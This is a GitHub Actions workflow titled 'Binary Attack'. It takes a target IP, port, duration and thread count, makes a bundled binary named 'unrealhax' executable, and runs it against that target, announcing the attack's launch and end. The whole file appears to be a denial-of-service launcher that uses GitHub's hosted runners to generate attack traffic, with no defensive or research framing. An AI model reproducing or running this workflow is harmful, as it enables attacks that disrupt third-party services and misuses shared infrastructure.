name: Binary Attack

on:
  workflow_dispatch:
    inputs:
      ip:
        description: 'Target IP'
        required: true
        type: string
      port:
        description: 'Target Port'
        required: true
        type: string
      duration:
        description: 'Duration (seconds)'
        required: true
        default: '30'
        type: string
      threads:
        description: 'Threads (Max 200)'
        required: false
        default: '100'
        type: string

jobs:
  attack:
    runs-on: ubuntu-latest
    
    steps:
    - name: Checkout
      uses: actions/checkout@v4
    
    - name: Make Binary Executable
      run: chmod +x unrealhax
    
    - name: Run Attack
      run: |
        echo "⚔️ Attack Launched! ⚔️"
        echo "🎯 Target: ${{ github.event.inputs.ip }}:${{ github.event.inputs.port }}"
        echo "⏱️ Duration: ${{ github.event.inputs.duration }} seconds"
        echo "🧵 Threads: ${{ github.event.inputs.threads }}"
        echo ""
        ./unrealhax ${{ github.event.inputs.ip }} ${{ github.event.inputs.port }} ${{ github.event.inputs.duration }} ${{ github.event.inputs.threads }}
        echo ""
        echo "✅ Attack Finished!"
